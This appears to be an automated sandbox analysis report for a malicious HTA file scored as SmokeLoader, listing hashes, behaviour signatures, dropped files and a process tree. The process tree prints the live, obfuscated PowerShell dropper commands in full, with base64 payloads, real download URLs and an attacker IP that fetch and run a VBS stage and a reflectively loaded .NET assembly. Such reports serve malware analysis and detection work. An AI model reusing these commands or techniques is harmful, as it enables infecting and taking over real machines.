Overview

overview

10

Static

static

1

begoodfore...od.hta

windows7-x64

10

begoodfore...od.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-01-2025 10:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    begoodforeverythinggreatthingsformebetterforgood.hta

  • Size

    108KB

  • MD5

    b7bd51ea4a3cbb85901f5e467009beaa

  • SHA1

    2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc

  • SHA256

    4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073

  • SHA512

    0d30af8454e5a74674e4f971e40a7c7781d0c29d48c25dd327b7bccad07f6208db24a078d8e03c07ae2bac7ac3ceba01b67668f7b3108456406c7a258fced032

  • SSDEEP

    384:Fipci1dZ2FGFZrZi9qiA/zRj6TiezFSw4M7333j333V333x333kD333n33P333UM:zFLFSwkGpe1zOhVadsRZ4

Score
10/10
smokeloaderbackdoordefense_evasiondiscoveryexecutiontrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20
exe.dropper

https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Smokeloader family
    smokeloader
  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
    defense_evasionexecution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\begoodforeverythinggreatthingsformebetterforgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:32
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3332
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hwuqdnzg\hwuqdnzg.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8136.tmp" "c:\Users\Admin\AppData\Local\Temp\hwuqdnzg\CSC665D674FB7CE4C0A9990E6665E43A5D.TMP"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3652
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1840
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              6⤵
              • Checks SCSI registry key(s)
              PID:2764

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    576c1403974bff6edd8de220dfa4df51

    SHA1

    6c6a2651f5d2f51639b594e0b3e05b027f42eb4f

    SHA256

    ea1ce19f683936015b11c86422f0d4628af1d27cc4ade543309c6722a5064af0

    SHA512

    d80796ecc8801b1be3ecfa72bea13e1c9d6d6ab335cc09296ab5cdffb75c64c4223c868a766fcb899b37da7dd357c63488542728616ca9d733071eca0f68bf54

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RES8136.tmp
    Filesize

    1KB

    MD5

    b5af75fbc4a27f666203d8ffb9f7458f

    SHA1

    07922a255344e68a59e91ccd3a023dc92f492ffc

    SHA256

    22dce34e8e600fa7838372e190135690c345a37ebad7bbc04a9bdcc38a3e87b4

    SHA512

    b3926082b59f328893579aa5e9b66097e607a053143678e972ac23bc5d464a1f5a8913d3e3eb8e36432947e2999b5d8ea3203c3be501b7936f57b04c7a30740e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wjo0lvbu.ipb.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\hwuqdnzg\hwuqdnzg.dll
    Filesize

    3KB

    MD5

    2907dca9d775a79abde1705f61459098

    SHA1

    09e5e804f382e916cef79ea36b8c415d3385dde2

    SHA256

    4a7a10c8255081c84c99158ba075aa54e4521ab4775a7be67f27dd0160b0b5f2

    SHA512

    06ff1444222a16892531a7dc82844cd06880bcaa69d91afd78acda9f229d6ab0ac5e66e283f5b24d5a406119f8cc7f410c2363f65b9616330b85c205d2a29457

    Download Submit

  • C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS
    Filesize

    219KB

    MD5

    8ccd875893cd23b67d7c61ea735f5c52

    SHA1

    6171c7dd4f67a67fff0ca151c7e9a06104e00def

    SHA256

    16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392

    SHA512

    3ceb06944fb1cb3f176e9163f761e3c2d97e72a9e0177f417d4a83e03f4b539fbcb2d7ebe53865a483cacdc8eaf16ce292245aed1cc60c207f7ca038ced07f31

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\hwuqdnzg\CSC665D674FB7CE4C0A9990E6665E43A5D.TMP
    Filesize

    652B

    MD5

    6f21da35a1be416da65ecae64c2315f1

    SHA1

    502d91042a849d52145f05090c4629fe4638beff

    SHA256

    6bae197d454e1eca00db24d2d30e8a6302e5f883e3586abc6b40baf5fa9e3061

    SHA512

    c706f2010674c2202b0e9ef3c8cae90dccca2cd774e948e117a75d5401d97e4145d73a0a47a95f6a52d3ef21acf63d4e0875390e51a366995a0ad418147a3897

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\hwuqdnzg\hwuqdnzg.0.cs
    Filesize

    478B

    MD5

    7836723690e40c9d8fbf78fbd248c066

    SHA1

    6a0f9fb57575624ad9ca54108abb75cb6b20fd3d

    SHA256

    a1dd056c3c937dd2fef8d026745f706da97f13205feba1bdae492d4b2cad07a9

    SHA512

    10c093f3aaef531e31196afcc50fe7d554eee7d49206046f0d0a6dd86f23ce73067a7b926b6acac810a5d33ecc98b605b1ff1e6eaf0d404a4c1d9265f8ac06a3

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\hwuqdnzg\hwuqdnzg.cmdline
    Filesize

    369B

    MD5

    fe2b77b495b30c8a1c31560407531600

    SHA1

    f6cd1203f42bdf77a0453e0667f4d8de7644a544

    SHA256

    d8c05dcec76494416c7ae45212a7cb5998507ce3e3f9db159ea01f48071f14ae

    SHA512

    ba708d47f5752b20cf3bedc6a16864e8ae0a95240198c0b0feb2804bb4399756ea0a939ace787f50d3bf0a46ce48aa33b7394d77b5fcf211da381e6135d7f95b

    Download Submit

  • memory/1840-79-0x0000000005660000-0x00000000059B4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1840-84-0x00000000072F0000-0x0000000007474000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/1840-85-0x0000000007510000-0x00000000075AC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/2764-86-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

    Download

  • memory/3332-39-0x0000000007920000-0x000000000792A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3332-20-0x0000000007500000-0x0000000007532000-memory.dmp

    Filesize

    200KB

    Download

  • memory/3332-23-0x000000006DB50000-0x000000006DEA4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3332-33-0x0000000006B40000-0x0000000006B5E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3332-34-0x0000000007540000-0x00000000075E3000-memory.dmp

    Filesize

    652KB

    Download

  • memory/3332-35-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-36-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-37-0x0000000007ED0000-0x000000000854A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3332-38-0x0000000005330000-0x000000000534A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3332-0-0x000000007113E000-0x000000007113F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3332-40-0x0000000007B40000-0x0000000007BD6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3332-41-0x0000000007AA0000-0x0000000007AB1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/3332-42-0x0000000007AD0000-0x0000000007ADE000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3332-43-0x0000000007AE0000-0x0000000007AF4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/3332-44-0x0000000007B20000-0x0000000007B3A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3332-45-0x0000000007B10000-0x0000000007B18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3332-22-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-21-0x000000006D9F0000-0x000000006DA3C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3332-19-0x00000000065F0000-0x000000000663C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3332-18-0x0000000006550000-0x000000000656E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3332-58-0x0000000007B10000-0x0000000007B18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3332-17-0x0000000006070000-0x00000000063C4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3332-64-0x000000007113E000-0x000000007113F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3332-65-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-66-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-16-0x00000000058B0000-0x0000000005916000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3332-71-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-6-0x0000000005840000-0x00000000058A6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3332-5-0x00000000055A0000-0x00000000055C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3332-4-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-2-0x0000000071130000-0x00000000718E0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3332-3-0x0000000005920000-0x0000000005F48000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3332-1-0x0000000002F70000-0x0000000002FA6000-memory.dmp

    Filesize

    216KB

    Download